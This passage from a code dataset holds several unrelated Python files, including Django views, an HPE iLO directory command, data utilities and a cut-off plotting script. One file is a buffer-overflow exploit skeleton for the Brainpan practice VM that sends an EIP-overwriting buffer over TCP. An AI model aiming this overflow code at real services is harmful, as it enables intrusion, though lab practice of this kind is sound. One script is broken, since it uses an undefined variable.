self._offset\n if self._range.contains(loc):\n break\n return loc\n\n def _update_range(self):\n \"\"\"Update the valid range.\n\n Compute the intersection of the valid range of each TensorData.\n \"\"\"\n assert self.has_spec()\n # Valid range.\n vr = None\n for key, dim in self._spec.items():\n if key in self._data:\n # Update patch size.\n self._data[key].set_fov(dim[-3:])\n # Update valid range.\n r = self._data[key].range()\n vr = r if vr is None else vr.intersect(r)\n self._range = vr\n\n\n########################################################################\n## VolumeDataset demo.\n########################################################################\n\nif __name__ == \"__main__\":\n\n import argparse\n import h5py\n import os\n import time\n\n from . import emio\n from . import transform\n\n dsc = 'VolumeDataset demo.'\n parser = argparse.ArgumentParser(description=dsc)\n\n parser.add_argument('z', type=int, help='sample z dim.')\n parser.add_argument('y', type=int, help='sample y dim.')\n parser.add_argument('x', type=int, help='sample x dim.')\n parser.add_argument('img', help='image file (h5 or tif) path.')\n parser.add_argument('lbl', help='label file (h5 or tif) path.')\n\n args = parser.parse_args()\n\n # Load data.\n img = emio.imread(args.img)\n lbl = emio.imread(args.lbl)\n\n # Preprocess.\n img = transform.divideby(img, val=255.0)\n\n # Create dataset and add data.\n vdset = VolumeDataset()\n vdset.add_raw_data(key='input', data=img)\n vdset.add_raw_data(key='label', data=lbl)\n\n # Random sample.\n size = (args.z, args.y, args.x)\n spec = dict(input=size, label=size)\n vdset.set_spec(spec)\n sample = vdset.random_sample()\n\n # Dump a single random sample.\n print('Save as file...')\n fname = 'sample.h5'\n if os.path.exists(fname):\n os.remove(fname)\n f = h5py.File(fname)\n for key, data in sample.items():\n f.create_dataset('/' + key, data=data)\n f.close()\n","sub_path":"python/dataprovider/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"309472596","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# exp for brainpain\n\nimport sys\nfrom time import sleep\nimport socket\n\n# bsize = int(sys.argv[3])\n\ndef attack(dst, dst_port, data):\n try:\n socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socks.connect((dst, dst_port))\n conn = socks.recv(1024)\n # print(conn)\n\n dd = data.encode('utf-8')\n socks.send(dd)\n print(\"Sending buffer: {}\".format(dd))\n # print(conn)\n except socket.error as err:\n print(\"Socket connect failed! {}\".format(err))\n finally:\n sleep(0.5)\n socks.close()\n\nif __name__ == '__main__':\n\n # buffer create python -c 'print(\"A\"*100)'\n # control esp\n\n junk = 'A'* 524 # ebp fill with 524 bytes 41414141\n eip = 'B' * 4 # eip register will be fill with B 42424242\n block = 'C' * (1000 - 524 - 4) # esp will be fill with C block 43434343\n buff = junk + eip + block\n\n host = str(sys.argv[1])\n port = int(sys.argv[2])\n\n attack(host, port, buff)\n","sub_path":"brainpan/exp_esp.py","file_name":"exp_esp.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"149690636","text":"from django.shortcuts import render, redirect, HttpResponse\nfrom .forms import formulario_contacto\nfrom django.core.mail import send_mail, EmailMultiAlternatives\nfrom ProyectoFinal.settings import EMAIL_HOST_USER\nfrom django.contrib import messages\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\n# Create your views here.\n\n\ndef contacto(request):\n\n formulario = formulario_contacto()\n\n if request.method == 'POST':\n formulario = formulario_contacto(request.POST)\n if formulario.is_valid():\n nombre = request.POST.get('nombre')\n email = request.POST.get('email')\n tfno = request.POST.get('tfno')\n mensaje = request.POST.get('mensaje')\n\n html_content = render_to_string(\n 'form_contacto/email_template.html', {'title': 'Test email', 'content': mensaje, 'email': email, 'tfno': tfno})\n\n text_content = strip_tags(html_content)\n\n email = EmailMultiAlternatives('Mensaje de: ' + nombre, 'Nombre: {} \\n Email: {} \\n Tfno: {} \\n Mensaje: {}'.format(\n nombre, email, tfno, text_content), email, ['ferranguillem8@gmail.com'])\n\n email.attach_alternative(html_content, 'text/html')\n email.send()\n\n messages.success(request, 'Mensaje enviado con éxito')\n try:\n\n return redirect('/contacto/?valido')\n\n except:\n messages.error(request, 'Ups! Ha ocurrido un error')\n return redirect('/contacto/?error')\n else:\n messages.error(request, 'Ups! Ha ocurrido un error')\n return redirect('/contacto/?error')\n\n return render(request, 'form_contacto/contacto.html', {'formulario': formulario})\n","sub_path":"ContactoApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"65265566","text":"# -*- coding:utf-8 -*-\n# Author: owhileo\n# Date: 2019-8-8\n# Version: 1.0\n\nimport json\n\n\ndef read_json(path):\n with open(path, 'r', encoding='utf-8') as f:\n data = json.load(f)\n return data\n\n\ndef find_new(data):\n summ = 0\n for x in data:\n label = True\n for y in x['records']:\n if y['label'] == 9:\n label = False\n if not label:\n break\n summ += 1\n print(\"newest car:{}\".format(summ))\n\n\nif __name__ == '__main__':\n dat = read_json(r'data4.json')\n find_new(dat)\n","sub_path":"while/fine_newest.py","file_name":"fine_newest.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"464622651","text":"import numpy as np\nfrom i2c.exp_types import GaussianI2c, CubatureQuadrature\n\nENVIRONMENT = \"LinearKnown\" # environment to control\n\n# top level training parameters\nN_DURATION = 60\nN_EPISODE = 1\nN_INFERENCE = 10\nN_AUG = 0\nN_STARTING = 0\nN_ITERS_PER_PLOT = 1 # N_INFERENCE + 1\nPOLICY_COVAR = 0 * np.eye(1)\nN_PLOTS = 1\n\n# model learning\nMODEL = None\n\n# input inference\nquad = CubatureQuadrature(1, 0, 0)\nINFERENCE = GaussianI2c(\n inference=quad,\n Q=np.diag([10.0, 10.0]),\n R=np.diag([1.0]),\n Qf=np.diag([10.0, 10.0]),\n alpha=800.0,\n alpha_update_tol=0.0,\n mu_u=np.zeros((N_DURATION, 1)),\n sig_u=1.0 * np.eye(1),\n mu_x_term=None,\n sig_x_term=None,\n)\n","sub_path":"scripts/experiments/linear_known_quad.py","file_name":"linear_known_quad.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"310693132","text":"from optparse import make_option\nfrom django.core.management.base import BaseCommand\nimport os\nfrom extract.LillyDownloader import LillyDownloader\nfrom index.es_index import ESTrialIndexer\n\nFILE_DIR = os.path.dirname(os.path.realpath(__file__))\n\n\nclass Command(BaseCommand):\n help = \"Elasticsearch - index json files containing study data from clinicaltrials.gov with option to download\"\n\n option_list = BaseCommand.option_list + (\n make_option('--data',\n dest='data',\n help='data directory containing json files'),\n make_option('--download',\n dest='download',\n help='True or False to download data from Lilly',\n default=False),\n make_option('--limit',\n dest='limit',\n help='the number of files to download from Lilly',\n default='100'),\n make_option('--doc_type',\n dest='doc_type',\n help='the document type used in indexing',\n default='study'),\n make_option('--index',\n dest='index',\n help='the name of the index',\n default='ctgov'),\n make_option('--autocomplete',\n dest='autocomplete',\n help='generate text files to use in autocomplete',\n default=False)\n )\n\n def handle(self, *args, **options):\n if options['download']:\n lilly = LillyDownloader(options['limit'], None, options['data'])\n indexer = ESTrialIndexer(options['data'], lilly, options['limit'], options['doc_type'], options['index'])\n indexer.download()\n else:\n loader = ESTrialIndexer(options['data'], None, options['limit'], options['doc_type'], options['index'])\n loader.index_data()\n\n\n","sub_path":"studies/lilly/management/commands/index_studies.py","file_name":"index_studies.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"255009876","text":"'''\n# -*- coding: utf-8 -*-\n# /***************************************************************************/\n# * __________________________________\n# * METIS CYBERSPACE TECHNOLOGY S.A.\n# * www.metis.tech\n# * __________________________________\n# * [2017] All Rights Reserved.\n# *\n# * NOTICE: All information contained herein is, and remains\n# * the property of Metis CyberSpace Technology and its suppliers,\n# * if any. The intellectual and technical concepts contained\n# * herein are proprietary to METIS CYBERSPACE TECHNOLOGY\n# * and its suppliers and may be covered by European and Foreign Patents,\n# * patents in process, and are protected by trade secret or copyright law.\n# * Dissemination of this information or reproduction of this material\n# * is strictly forbidden unless prior written permission is obtained\n# * from Metis Cyberspace Technology.\n#\n# /***************************************************************************/\nFile: Authorization.py\nFile Created: Tuesday, 9th October 2018 3:59:20 pm\nAuthor: alverto.benroumpi (alverto.benroumpi@metis.tech)\n'''\nimport base64\nimport requests\nfrom metis_pylib import LOGGER\n\nclass Authorization:\n\n \n def getToken(self, env_vars):\n self.env_vars = env_vars\n self.auth_url = self.env_vars['auth_url']\n self.client_id = self.env_vars['client_id']\n self.client_secret = self.env_vars['client_secret']\n\n auth = base64.b64encode((self.client_id + ':' + self.client_secret).encode('utf-8'))\n token = requests.post(self.auth_url,\n headers={'Authorization': 'Basic ' + auth.decode(\"utf-8\")},\n data={'grant_type': 'client_credentials'})\n if token.status_code == 200:\n token = token.json()['access_token']\n return token\n else:\n LOGGER.error('Failed to obtain token, status code is ' + str(token.status_code))\n return []","sub_path":"Metis/metis-pylib/metis_pylib/security/Authorization.py","file_name":"Authorization.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"130613178","text":"# -*- coding:utf-8 -*-\n\nimport pickle\nd = dict(name='Bob', age=20, score=88)\npickling1 = pickle.dumps(d)\nprint(pickling1)\na = dict()\n\nwith open('D:/Learn-Python/test/dump.txt', 'wb') as f:\n pickle.dump(d, f)\n print(d)\n\nwith open('D:/Learn-Python/test/dump.txt', 'rb') as f:\n a = pickle.load(f)\n print(a)\n","sub_path":"study_doc/lxf_Tutorial/IO编程/序列化.py","file_name":"序列化.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"567638793","text":"###\n# Copyright 2017 Hewlett Packard Enterprise, Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n###\n\n# -*- coding: utf-8 -*-\n\"\"\" Directory Command for rdmc \"\"\"\n\nimport re\nimport sys\nimport getpass\n\nfrom argparse import ArgumentParser, REMAINDER, Action\n\nfrom redfish.ris.rmc_helper import IloResponseError\n\nfrom rdmc_base_classes import RdmcCommandBase, add_login_arguments_group\nfrom rdmc_helper import ReturnCodes, InvalidCommandLineError, IncompatibleiLOVersionError,\\\n InvalidCommandLineErrorOPTS, NoContentsFoundForOperationError, UI,\\\n ResourceExists, Encryption\n\nclass _DirectoryParse(Action):\n def __init__(self, option_strings, dest, nargs, **kwargs):\n super(_DirectoryParse, self).__init__(option_strings, dest, nargs, **kwargs)\n def __call__(self, parser, namespace, values, option_strings):\n \"\"\" Helper for parsing options \"\"\"\n if option_strings.endswith('disable'):\n setattr(namespace, self.dest, False)\n elif option_strings.endswith('enable'):\n setattr(namespace, self.dest, True)\n elif option_strings.endswith('enablelocalauth'):\n setattr(namespace, self.dest, False)\n elif option_strings.endswith('disablelocalauth'):\n setattr(namespace, self.dest, True)\n elif option_strings == '--removerolemap':\n setattr(namespace, self.dest, {'remove': []})\n for role in next(iter(values)).split(','):\n role = role.replace('\"', '')\n if role:\n namespace.roles['remove'].append(role)\n elif option_strings == '--addrolemap':\n setattr(namespace, self.dest, {'add': []})\n for role in next(iter(values)).split(','):\n role = role.replace('\"', '')\n if role and re.match('.*:.*', role):\n namespace.roles['add'].append(role)\n else:\n try:\n parser.error(\"Supply roles to add in form :\")\n except:\n raise InvalidCommandLineErrorOPTS(\"\")\n elif option_strings == '--addsearch':\n setattr(namespace, self.dest, {'add': []})\n for search in next(iter(values)).split(','):\n if search:\n namespace.search['add'].append(search)\n elif option_strings == '--removesearch':\n setattr(namespace, self.dest, {'remove': []})\n for search in next(iter(values)).split(','):\n if search:\n namespace.search['remove'].append(search)\n\nclass DirectoryCommand(RdmcCommandBase):\n \"\"\" Update directory settings on the server \"\"\"\n def __init__(self, rdmcObj):\n RdmcCommandBase.__init__(self,\\\n name='directory',\\\n usage='directory [kerberos/ldap/test] [OPTIONS]\\n\\n\\t'\\\n 'Add credentials, service address, two search strings, and enable LDAP directory'\\\n ' service.\\n\\texample: directory ldap --serviceaddress x.x.y.z --addsearch string1,'\\\n 'string2 --enable username password\\n\\n\\tAdd service address, port, and realm for '\\\n 'Kerberos.\\n\\texample: directory kerberos --serviceaddress x.x.y.z --port 8888 '\\\n '--realm arealm\\n\\n\\tAdd 2 directory roles.\\n\\texample: directory ldap --addrolemap '\\\n '\"LocalRole1:RemoteGroup3,LocalRole2:RemoteGroup4:SID\"\\n\\n\\tRemove 2 directory '\\\n 'roles.\\n\\texample: directory ldap --removerolemap LocalRole1,LocalRole2\\n\\n\\tStart a '\\\n 'directory test.\\n\\texample: directory test start\\n\\n\\tStop a directory test\\n\\t'\\\n 'example: directory test stop\\n\\n\\tView results of the last directory test.\\n\\t'\\\n 'example: directory test viewresults\\n\\n\\tNOTE: When adding role map SID is optional.',\\\n summary='Update directory settings, add/delete directory roles, and test directory '\\\n 'settings.',\\\n aliases=['ad', 'activedirectory'],\\\n argparser=ArgumentParser())\n self.definearguments(self.parser)\n self._rdmc = rdmcObj\n self.typepath = rdmcObj.app.typepath\n self.lobobj = rdmcObj.commands_dict[\"LoginCommand\"](rdmcObj)\n\n def run(self, line):\n \"\"\"Main directory Function\n\n :param line: string of arguments passed in\n :type line: str.\n \"\"\"\n try:\n (options, args) = self._parse_arglist(line)\n except (InvalidCommandLineErrorOPTS, SystemExit):\n if (\"-h\" in line) or (\"--help\" in line):\n return ReturnCodes.SUCCESS\n else:\n raise InvalidCommandLineErrorOPTS(\"\")\n\n self.directoryvalidation(options)\n if self._rdmc.app.getiloversion() < 5.140:\n raise IncompatibleiLOVersionError(\"Directory settings are only available on \"\\\n \"iLO 5 1.40 or greater.\")\n if len(args) < 1 or len(args) > 3:\n raise InvalidCommandLineError(\"Invalid number of arguments entered.\")\n elif len(args) == 3 and args[0].lower() == 'kerberos':\n raise InvalidCommandLineError(\"Username and password can only be set for LDAP.\")\n elif len(args) == 2 and args[0].lower() in ['ldap']:\n sys.stdout.write('Please input the password for the directory.\\n')\n tempinput = getpass.getpass()\n args.extend([tempinput])\n\n elif len(args) == 2 and args[0].lower() == 'test':\n if not args[1] in ['start', 'stop', 'viewresults']:\n raise InvalidCommandLineError('Please input \"start\" to start the directory test, '\\\n '\"stop\" to stop the directory test, or \"viewresults\" to see the results of'\\\n ' the last directory test.')\n\n results = None\n\n if args[0].lower() == 'ldap':\n if options.realm or options.keytab:\n raise InvalidCommandLineError(\"Keytab and Realm options are not available for \"\\\n \"LDAP.\")\n try:\n results = self._rdmc.app.select(selector='AccountService.', rel=True)[0].dict\n path = results[self._rdmc.app.typepath.defs.hrefstring]\n oem = results['Oem'][self.typepath.defs.oemhp]\n local_auth = results['LocalAccountAuth']\n results = results['LDAP']\n name = 'LDAP'\n except (KeyError, IndexError):\n raise NoContentsFoundForOperationError(\"Unable to gather LDAP settings.\")\n\n elif args[0].lower() == 'kerberos':\n if options.authmode or options.search:\n raise InvalidCommandLineError(\"Authentication and add/remove search options \"\\\n \"are not available for Kerberos.\")\n try:\n results = self._rdmc.app.select(selector='AccountService.', rel=True)[0].dict\n path = results[self._rdmc.app.typepath.defs.hrefstring]\n oem = results['Oem'][self.typepath.defs.oemhp]\n local_auth = results['LocalAccountAuth']\n results = results['ActiveDirectory']\n name = 'ActiveDirectory'\n except (KeyError, IndexError):\n raise NoContentsFoundForOperationError(\"Unable to gather Kerberos settings.\")\n\n elif not args[0].lower() == 'test':\n raise InvalidCommandLineError(\"Please choose LDAP, Kerberos to read or modify \"\\\n \"directory settings or test to test directory settings.\")\n\n if results:\n keytab = None\n payload = {}\n if options.keytab:\n keytab = options.keytab\n try:\n directory_settings = self.directory_helper(results, options, args[1], args[2])\n except IndexError:\n directory_settings = self.directory_helper(results, options)\n\n if directory_settings:\n payload[name] = directory_settings\n\n if options.authmode:\n payload.update({'Oem':{'Hpe':{'DirectorySettings': \\\n {'LdapAuthenticationMode': options.authmode}}}})\n\n if not payload and not keytab:\n if options.json:\n UI().print_out_json({name: results, 'LocalAccountAuth': local_auth, \\\n \"Oem\": {\"Hpe\": oem}})\n else:\n self.print_settings(results, oem, local_auth, name)\n\n if payload:\n if options.localauth:\n payload['LocalAccountAuth'] = 'Enabled' if options.localauth else 'Disabled'\n sys.stdout.write(\"Changing settings...\\n\")\n try:\n self._rdmc.app.patch_handler(path, payload)\n except IloResponseError:\n if len(args) == 3 and not results['ServiceEnabled']:\n sys.stderr.write(\"You must enable this directory service before or during\"\\\n \" assignment of username and password. Try adding the flag --enable.\\n\")\n raise IloResponseError(\"\")\n else:\n raise\n if keytab:\n path = oem['Actions'][next(iter(oem['Actions']))]['target']\n sys.stdout.write(\"Adding keytab...\\n\")\n self._rdmc.app.post_handler(path, {\"ImportUri\": keytab})\n else:\n self.test_directory(args[1], json=options.json)\n\n return ReturnCodes.SUCCESS\n\n def directory_helper(self, settings, options, username=None, password=None):\n \"\"\" Helper function to set the payload based on options and arguments\n\n :param settings: dictionary to change\n :type settings: dict.\n :param options: list of options\n :type options: list.\n :param username: username to apply\n :type username: str.\n :param password: password to apply\n :type password: str.\n \"\"\"\n\n payload = {}\n serviceaddress = None\n\n if isinstance(options.serviceaddress, str):\n serviceaddress = options.serviceaddress\n if serviceaddress == '\"\"' or serviceaddress == \"''\":\n serviceaddress = ''\n if isinstance(options.port, str):\n if serviceaddress is None:\n serviceaddress = settings['ServiceAddresses'][0]\n serviceaddress = serviceaddress + ':' + options.port\n if isinstance(options.realm, str):\n if serviceaddress is None:\n serviceaddress = settings['ServiceAddresses'][0]\n if options.realm == '\"\"' or options.realm == \"''\":\n options.realm = ''\n serviceaddress = serviceaddress + '@' + options.realm\n if not serviceaddress is None:\n payload['ServiceAddresses'] = [serviceaddress]\n\n if not options.enable is None:\n payload['ServiceEnabled'] = options.enable\n\n if username and password:\n payload.update({\"Authentication\":{\"Username\": username, \"Password\": password}})\n\n if options.roles:\n payload['RemoteRoleMapping'] = self.role_helper(options.roles, \\\n settings['RemoteRoleMapping'])\n\n if options.search:\n payload.update({\"LDAPService\": {\"SearchSettings\": self.search_helper(options.search, \\\n settings['LDAPService']['SearchSettings'])}})\n\n return payload\n\n def test_directory(self, command, json=False):\n \"\"\" Function to perform directory testing\n\n :param command: command to run against directory test. (start/stop/viewresults)\n :type command: str.\n :param json: Bool to print in json format or not.\n :type json: bool.\n \"\"\"\n results = self._rdmc.app.select(selector='HpeDirectoryTest.', rel=True)[0].dict\n if command.lower() == 'start':\n path = None\n for item in results['Actions']:\n if 'StartTest' in item:\n path = results['Actions'][item]['target']\n break\n if not path:\n raise NoContentsFoundForOperationError(\"Unable to start directory test.\")\n sys.stdout.write(\"Starting the directory test. Monitor results with command: directory\"\\\n \" viewresults\\n\")\n self._rdmc.app.post_handler(path, {})\n elif command.lower() == 'stop':\n path = None\n for item in results['Actions']:\n if 'StopTest' in item:\n path = results['Actions'][item]['target']\n break\n if not path:\n raise NoContentsFoundForOperationError(\"Unable to stop directory test.\")\n sys.stdout.write(\"Stopping the directory test.\\n\")\n self._rdmc.app.post_handler(path, {})\n elif command.lower() == 'viewresults':\n if json:\n UI().print_out_json(results['TestResults'])\n else:\n for test in results['TestResults']:\n sys.stdout.write('Test: %s\\n' % test['TestName'])\n sys.stdout.write(\"------------------------\\n\")\n sys.stdout.write('Status: %s\\n' % test['Status'])\n sys.stdout.write('Notes: %s\\n' % test['Notes'])\n sys.stdout.write(\"\\n\")\n\n def print_settings(self, settings, oem_settings, local_auth_setting, name):\n \"\"\" Pretty print settings of LDAP or Kerberos\n\n :param settings: settings to print\n :type settings: dict.\n :param oem_settings: oem_settings to print\n :type oem_settings: dict.\n :param local_auth_settings: local authorization setting\n :type local_auth_settings: str.\n :param name: type of setting (activedirectory or ldap)\n :type name: str.\n \"\"\"\n sys.stdout.write(\"%s settings:\\n\" % ('Kerberos' if name == 'ActiveDirectory' else name))\n sys.stdout.write(\"--------------------------------\\n\")\n sys.stdout.write(\"Enabled: %s\\n\" % str(settings['ServiceEnabled']))\n\n serviceaddress = settings['ServiceAddresses'][0]\n\n sys.stdout.write(\"Service Address: %s\\n\" % (serviceaddress if serviceaddress else \\\n \"Not Set\"))\n\n sys.stdout.write(\"Local Account Authorization: %s\\n\" % local_auth_setting)\n\n if name.lower() == 'activedirectory':\n address_settings = oem_settings['KerberosSettings']\n sys.stdout.write(\"Port: %s\\n\" % address_settings['KDCServerPort'])\n\n sys.stdout.write(\"Realm: %s\\n\" % (address_settings['KerberosRealm'] if \\\n address_settings['KerberosRealm'] else \"Not Set\"))\n else:\n address_settings = oem_settings['DirectorySettings']\n sys.stdout.write(\"Port: %s\\n\" % address_settings['LdapServerPort'])\n sys.stdout.write(\"Authentication Mode: %s\\n\" % \\\n address_settings['LdapAuthenticationMode'])\n\n sys.stdout.write(\"Search Settings:\\n\")\n try:\n count = 1\n for search in settings['LDAPService']['SearchSettings'][\"BaseDistinguishedNames\"]:\n sys.stdout.write(\"\\tSearch %s: %s\\n\" % (count, search))\n count += 1\n except KeyError:\n sys.stdout.write(\"\\tNo Search Settings\\n\")\n\n sys.stdout.write(\"Remote Role Mapping(s):\\n\")\n for role in settings['RemoteRoleMapping']:\n sys.stdout.write(\"\\tLocal Role: %s\\n\" % role['LocalRole'])\n sys.stdout.write(\"\\tRemote Group: %s\\n\" % role['RemoteGroup'])\n\n def role_helper(self, new_roles, curr_roles):\n \"\"\" Helper to prepare adding and removing roles for patching\n\n :param new_roles: dictionary of new roles to add or remove\n :type new_roles: dict.\n :param curr_roles: list of current roles on the system\n :type curr_roles: list.\n \"\"\"\n final_roles = curr_roles\n if 'add' in new_roles:\n for role in new_roles['add']:\n role = role.split(':', 1)\n if not self.duplicate_group(role[1], curr_roles):\n final_roles.append({\"LocalRole\":role[0], \"RemoteGroup\":role[1]})\n else:\n raise ResourceExists('Group DN \"%s\" already exists.' % role[1].split(':')[0])\n if 'remove' in new_roles:\n removed = False\n for role in new_roles['remove']:\n removed = False\n for item in reversed(final_roles):\n if item['LocalRole'] == role:\n del final_roles[final_roles.index(item)]\n removed = True\n break\n if not removed:\n raise InvalidCommandLineError(\"Unable to find local role %s to delete\" % role)\n\n return final_roles\n\n def duplicate_group(self, group_dn, curr_roles):\n \"\"\" Checks if new role is a duplicate\n\n :param group_dn: group domain name from user\n :type group_dn: str.\n :param curr_roles: list of current roles\n :type curr_roles: list.\n \"\"\"\n group_dn = group_dn.split(':')[0]\n for item in curr_roles:\n comp_dn = item[\"RemoteGroup\"].split(':')[0]\n if comp_dn == group_dn:\n return True\n return False\n\n def search_helper(self, new_searches, curr_searches):\n \"\"\" Helper to prepare search strings for patching\n\n :param new_serches: dictionary of new searches to add\n :type new_searches: dict.\n :param curr_searches: list of current searches\n :type curr_searches: dict.\n \"\"\"\n final_searches = curr_searches\n\n if 'add' in new_searches:\n if 'BaseDistinguishedNames' in final_searches:\n for search in new_searches['add']:\n final_searches['BaseDistinguishedNames'].append(search)\n else:\n final_searches['BaseDistinguishedNames'] = new_searches['add']\n elif 'remove' in new_searches:\n to_remove = []\n\n if 'BaseDistinguishedNames' not in curr_searches:\n raise NoContentsFoundForOperationError(\"No search strings to remove\")\n\n for search in new_searches['remove']:\n if search in curr_searches['BaseDistinguishedNames']:\n to_remove.append(search)\n else:\n raise InvalidCommandLineError(\"Unable to find search %s to delete\" % search)\n for item in to_remove:\n final_searches['BaseDistinguishedNames'].remove(item)\n\n if not final_searches['BaseDistinguishedNames']:\n sys.stdout.write('Attempting to delete all searches.\\n')\n final_searches['BaseDistinguishedNames'].append(\"\")\n\n return final_searches\n\n def directoryvalidation(self, options):\n \"\"\" directory validation function\n\n :param options: command line options\n :type options: list.\n \"\"\"\n client = None\n inputline = list()\n\n try:\n client = self._rdmc.app.current_client\n except Exception:\n if options.user or options.password or options.url:\n if options.url:\n inputline.extend([options.url])\n if options.user:\n if options.encode:\n options.user = Encryption.decode_credentials(options.user)\n inputline.extend([\"-u\", options.user])\n if options.password:\n if options.encode:\n options.password = Encryption.decode_credentials(options.password)\n inputline.extend([\"-p\", options.password])\n if options.https_cert:\n inputline.extend([\"--https\", options.https_cert])\n else:\n if self._rdmc.app.config.get_url():\n inputline.extend([self._rdmc.app.config.get_url()])\n if self._rdmc.app.config.get_username():\n inputline.extend([\"-u\", self._rdmc.app.config.get_username()])\n if self._rdmc.app.config.get_password():\n inputline.extend([\"-p\", self._rdmc.app.config.get_password()])\n if self._rdmc.app.config.get_ssl_cert():\n inputline.extend([\"--https\", self._rdmc.app.config.get_ssl_cert()])\n\n if inputline:\n self.lobobj.loginfunction(inputline)\n elif not client:\n raise InvalidCommandLineError(\"Please login or pass credentials\" \\\n \" to complete the operation.\")\n\n def definearguments(self, customparser):\n \"\"\" Wrapper function for new command main function\n\n :param customparser: command line input\n :type customparser: parser.\n \"\"\"\n if not customparser:\n return\n\n add_login_arguments_group(customparser)\n\n customparser.add_argument(\n '--enable',\n '--disable',\n dest='enable',\n type=str,\n nargs=REMAINDER,\n action=_DirectoryParse,\n help=\"Optionally add this flag to enable or disable LDAP or Kerberos services.\",\n default=None,\n )\n customparser.add_argument(\n '--serviceaddress',\n dest='serviceaddress',\n help=\"Optionally include this flag to set the service address of the LDAP or \"\\\n \"Kerberos Services.\",\n default=None,\n )\n customparser.add_argument(\n '--port',\n dest='port',\n help=\"Optionally include this flag to set the port of the LDAP or Kerberos services.\",\n default=None,\n )\n customparser.add_argument(\n '--realm',\n dest='realm',\n help=\"Optionally include this flag to set the Kerberos realm.\",\n default=None,\n )\n customparser.add_argument(\n '--keytab',\n dest='keytab',\n help=\"Optionally include this flag to import a Kerberos Keytab by it's URI location.\",\n default=\"\",\n )\n customparser.add_argument(\n '--enablelocalauth',\n '--disablelocalauth',\n dest='localauth',\n nargs=REMAINDER,\n type=str,\n action=_DirectoryParse,\n help=\"Optionally include this flag if you wish to enable or disable authentication \"\\\n \"for local accounts.\",\n default=None\n )\n customparser.add_argument(\n '--authentication',\n dest='authmode',\n choices=['DefaultSchema', 'ExtendedSchema'],\n help=\"Optionally include this flag if you would like to choose a LDAP authentication \"\n \"mode Valid choices are: DefaultSchema (Directory Default Schema or Schema-free) or \"\\\n \"ExtendedSchema (HPE Extended Schema).\",\n default=None\n )\n customparser.add_argument(\n '--addsearch',\n '--removesearch',\n dest='search',\n nargs=REMAINDER,\n action=_DirectoryParse,\n help=\"Optionally add this flag to add or remove search strings for \"\\\n \"generic LDAP services. EX: --addsearch search1,search2\",\n type=str,\n default={},\n )\n customparser.add_argument(\n '--addrolemap',\n '--removerolemap',\n dest='roles',\n nargs=REMAINDER,\n action=_DirectoryParse,\n help=\"Optionally add this flag to add or remove Role Mapping(s) for the LDAP and \"\\\n \"Kerberos services. Remove EX: --removerolemap LocalRole1,LocalRole2 \"\\\n 'Add EX: --addrolemap \"LocalRole1:RemoteGroup3,LocalRole2:RemoteGroup4\"',\n type=str,\n default={},\n )\n customparser.add_argument(\n '-j',\n '--json',\n dest='json',\n action=\"store_true\",\n help=\"Optionally include this flag if you wish to change the\"\\\n \" displayed output to JSON format. Preserving the JSON data\"\\\n \" structure makes the information easier to parse.\",\n default=False\n )\n","sub_path":"src/extensions/iLO COMMANDS/DirectoryCommand.py","file_name":"DirectoryCommand.py","file_ext":"py","file_size_in_byte":25328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"466316595","text":"import model\nimport Visualization_data as vd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\nimport seaborn as sns\nsns.set_style(\"whitegrid\")\n\n#################################################################################\n# Further version of this file expected to be concise in plotting and monitoring#\n#################################################################################\n\n\n\n#Visualization learning process\n\n#Setup\n# boundary of the graph\nGRID_X_START = -1.5\nGRID_X_END = 2.5\nGRID_Y_START = -1.0\nGRID_Y_END = 2\n# output directory (the folder must be created on the drive)\nOUTPUT_DIR = \"./monitor_plots/\"\n\n#Grid boundary\ngrid = np.mgrid[GRID_X_START:GRID_X_END:100j,GRID_X_START:GRID_Y_END:100j]\ngrid_2d = grid.reshape(2, -1).T\nXX, YY = grid\n\n#Callback\ndef callback_numpy_plot(index, params):\n plot_title = \"NumPy Model - It: {:05}\".format(index)\n file_name = \"numpy_model_{:05}.png\".format(index//50)\n file_path = os.path.join(OUTPUT_DIR, file_name)\n prediction_probs, _ = model.full_forward_propagation(np.transpose(grid_2d), params, model.architecture)\n prediction_probs = prediction_probs.reshape(prediction_probs.shape[1], 1)\n vd.make_plot(vd.X_test, vd.y_test, plot_title, file_name=file_path, XX=XX, YY=YY, preds=prediction_probs, dark=True)\n \n#Traing callback\nparams_values, ini_params, cost_history, accuracy_history, grads_values, cashe = model.train(np.transpose(vd.X_train), np.transpose(vd.y_train.reshape((vd.y_train.shape[0], 1))), model.nn_architecture, init_strategy , 10000, 0.01, False, callback_numpy_plot)\n\n#Prediction and plotting\nprediction_probs_numpy, _ = model.full_forward_propagation(np.transpose(grid_2d), params_values, model.architecture)\nprediction_probs_numpy = 